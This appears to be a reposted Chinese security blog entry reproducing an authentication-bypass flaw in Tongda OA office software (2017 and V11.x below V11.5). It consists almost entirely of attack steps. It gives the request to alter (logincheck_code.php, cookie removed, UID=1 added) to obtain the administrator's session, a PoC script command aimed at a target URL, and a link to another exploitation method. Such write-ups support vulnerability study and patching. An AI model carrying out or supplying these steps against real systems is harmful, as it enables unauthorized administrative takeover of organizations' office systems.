4.22通達oa獲取任意用戶session登錄復現


簡述

通達OA是北京通達信科科技有限公司出品的 "Office Anywhere 通達網絡智能辦公系統"。
該漏洞可獲取任意用戶session,包括系統管理員

影響范圍

通達OA2017
V11.X<V11.5

手工復現

測試版本2017

  1. 抓登陸包

  2. 修改再發包
    三處地方需要修改:

  • logincheck.php=>/logincheck_code.php
  • cookie刪掉
  • POST包里加個UID=1

返回的session就是對應UID用戶的session
UID=1就是系統管理員
3. 替換cookie登錄

訪問/general/

poc測試

https://github.com/NS-Sp4ce/TongDaOA-Fake-User
python3 POC.py -v (2017|11) -url url

另一處利用方法

https://mp.weixin.qq.com/s?__biz=MzI0NzEwOTM0MA==&mid=2652477208&idx=1&sn=0bb9ed324bcc49dfd07bc5e22c3f66aa&chksm=f25834abc52fbdbd7043bb4b50c80fce3de9b24a509f31480310e4a8fc3dc3b292599829cab4&mpshare=1&scene=23&srcid=&sharer_sharetime=1592631445187&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM